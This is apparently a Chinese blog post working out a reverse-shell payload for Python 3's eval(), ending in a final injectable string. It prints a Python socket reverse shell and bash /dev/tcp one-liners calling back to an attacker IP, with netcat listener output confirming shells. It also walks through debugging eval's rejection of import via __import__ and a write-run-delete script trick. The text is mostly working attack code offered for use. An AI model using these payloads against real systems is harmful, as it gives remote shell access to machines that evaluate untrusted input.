python3 利用eval反弹shell

青旅半醒 2021-08-19 17:17 870阅读 0赞

在最近的python开发中 用到了 字符串转字典 使用了eval 这让我想起了php中的eval 搜索一下果然问题严重

既然有问题 那就来试试反弹shell吧 看看效果

搜索一下 找到了 python的反弹shell 代码

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("攻击机ip",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

写入测试 先验证一下是否正确：

# -*- coding:utf-8 -*-
    
    if __name__ == "__main__":
        import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.6.111",1111));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"])

nc监听  运行test.py  nc输出如下：

[root@localhost ~]$nc -l -p 1111
    [root@8168b454c427 weak]$

通过提示符的不同 可以看到已经得到shell  继续测试eval

写入测试代码 test.py

# -*- coding:utf-8 -*-
    
    if __name__ == "__main__":
        eval("import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.168.6.111\",1111));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/bash\",\"-i\"]);'")

执行后报错：

[root@8168b454c427 weak]$python test.py
    Traceback (most recent call last):
      File "test.py", line 6, in <module>
        eval("import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.168.6.111\",1111));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/bash\",\"-i\"]);'")
      File "<string>", line 1
        import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.6.111",1111));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
             ^
    SyntaxError: invalid syntax
    [root@8168b454c427 weak]$

定位到import 缩短测试代码 定位错误

# -*- coding:utf-8 -*-
    
    if __name__ == "__main__":
        eval("import socket")

发现依然报错，错误如下：

[root@8168b454c427 weak]$python test.py
    Traceback (most recent call last):
      File "test.py", line 5, in <module>
        eval("import socket")
      File "<string>", line 1
        import socket
             ^
    SyntaxError: invalid syntax
    [root@8168b454c427 weak]$

由此怀疑 不能使用 import 搜索下替换方案 发现有 \_\_import\_\_()  具体参考《[python3 import 和\_\_import\_\_() 的区别][python3 import _import_]》

继续修改代码

# -*- coding:utf-8 -*-
    
    if __name__ == "__main__":
        eval("__import__('socket')")

此时发现正常运行了 输出如下：

[root@8168b454c427 weak]$python test.py
    [root@8168b454c427 weak]$

虽然导入成功但是通过 《[python3 import 和\_\_import\_\_() 的区别][python3 import _import_]》知道 \_\_import\_\_ 不会绑定变量 这意味代码中的每个变量 都要用\_\_import\_\_ 来代替使用，继续改下代码试试：

# -*- coding:utf-8 -*-
    
    if __name__ == "__main__":
        eval("__import__('socket').socket(__import__('socket').AF_INET,__import__('socket').SOCK_STREAM).connect((\"192.168.6.111\",1111));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/bash\",\"-i\"]);'")

写到一半发现 无法实现了 因为后边的 os.dup2(s.fileno(),0) 中的s 是前边的socket对象 没有变量无法传递。。既然如此想想其他办法

这时想到了bash的反弹shell，如果用python来执行shell怎么样呢，查询一下代码如下：

bash -i >& /dev/tcp/192.168.6.111/1111 0>&1

可以看出十分简短 直接放入python中测试：

# -*- coding:utf-8 -*-
    
    if __name__ == "__main__":
        eval("__import__('subprocess').call(\"bash -i >& /dev/tcp/192.168.6.141/1111 0>&1\",shell=True)")

运行结果如下：

[root@8168b454c427 weak]$python test.py
    /bin/sh: can't create /dev/tcp/192.168.6.111/1111: nonexistent directory
    [root@8168b454c427 weak]$

报错 nonexistent directory 搜索一下无确切答案，但有提到 \#!/bin/bash 问题 感觉是环境变量造成的问题 看到 \#!/bin/bash 让我想到了shell脚本 是否写入脚本再执行试试呢

继续改写测试代码 这里把bash该为sh  一是简短代码  二是sh比bash更普遍存在各个linux发行版

# -*- coding:utf-8 -*-
    
    if __name__ == "__main__":
        eval("__import__('subprocess').call(\"echo -e '#!/bin/bash\\nsh -i >& /dev/tcp/192.168.6.111/1111 0>&1'>x && bash x && rm -rf x\",shell=True)")

nc端输出：

[root@localhost ~]$nc -l -p 1111
    /mnt/pandora/tools/weak #

可以见已经连上 想着优化一下 让整体代码短一点 继续修改：

# -*- coding:utf-8 -*-
    
    if __name__ == "__main__":
        eval("__import__('subprocess').call(\"echo 'sh -i >& /dev/tcp/192.168.6.111/1111 0>&1'>x && bash x && rm -rf x\",shell=True)")

同样成功了，至此就得到了 python3 下 eval 反弹shell的字符串代码了：

"\_\_import\_\_('subprocess').call(\\"echo 'sh -i >& /dev/tcp/192.168.6.111/1111 0>&1'>x && bash x && rm -rf x\\",shell=True)"

文中涉及的知识点可以参考：

《python3 import 和\_\_import\_\_() 的区别》  
https://blog.csdn.net/whatday/article/details/102748166

《python3 eval安全替代函数ast.literal\_eval》  
https://blog.csdn.net/whatday/article/details/102747599

《一句话反弹shell》  
https://blog.csdn.net/whatday/article/details/102743552

[python3 import _import_]: https://blog.csdn.net/whatday/article/details/102748166